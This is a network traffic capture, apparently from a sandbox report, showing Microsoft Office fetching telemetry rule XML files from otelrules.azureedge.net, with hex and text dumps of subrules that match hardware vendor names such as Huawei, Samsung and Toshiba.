2024-11-15 13:10:03 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.4	49788	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:03 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:03 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:03 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: d36f9ca3-a01e-0021-21af-36814c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131003Z-16547b76f7fknvdnhC1DFWxnys0000000n80000000005t9z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:03 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.4	49789	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:03 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:04 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:03 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 46322fa8-301e-001f-3c91-36aa3a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131003Z-16547b76f7fcrtpchC1DFW52e80000000n9g000000002twd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:04 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.4	49790	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:03 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:04 UTC	491	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:04 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: 584cc2e3-301e-005d-1eab-36e448000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131004Z-16547b76f7fm7xw6hC1DFW5px40000000n5g000000002yx6 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:04 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.4	49792	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:04 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:04 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:04 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: 2e90e071-a01e-0098-64a3-348556000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131004Z-1866b5c5fbbstkfjhC1DFWhdyg00000001g0000000001m4k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:04 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.4	49793	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:04 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:04 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:04 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: a0c6f192-101e-007a-2f09-37047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131004Z-16547b76f7fljddfhC1DFWeqbs000000026g000000006knw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:04 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.4	49791	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:04 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:04 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:04 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: 75c16ba8-801e-0067-10f8-36fe30000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131004Z-164f84587bf5rpzqhC1DFWmra8000000019g000000009fsz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:04 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.4	49794	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:04 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:04 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:04 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: 7cdefebb-b01e-0070-2ca7-341cc0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131004Z-164f84587bf2rt9xhC1DFW8drg000000018g0000000002w5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:04 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.4	49796	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:04 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:04 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:04 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: ceff4d6f-101e-007a-10c7-2c047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131004Z-16547b76f7ffx24hhC1DFW9px400000000t000000000fe4x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:04 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.4	49795	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:04 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:05 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:04 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: a0d12520-501e-0029-67fa-36d0b8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131004Z-164f84587bfgp2sdhC1DFWyhvn00000001k00000000068ba x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:05 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.4	49798	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:05 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:05 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:05 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: a9c4265b-101e-000b-57af-365e5c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131005Z-16547b76f7f7scqbhC1DFW0m5w0000000my000000000enca x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:05 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.4	49799	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:05 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:05 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:05 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: fdac4f62-e01e-0085-71ab-36c311000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131005Z-16547b76f7fht2hfhC1DFWbngg00000001q000000000b5n7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:05 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.4	49800	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:05 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
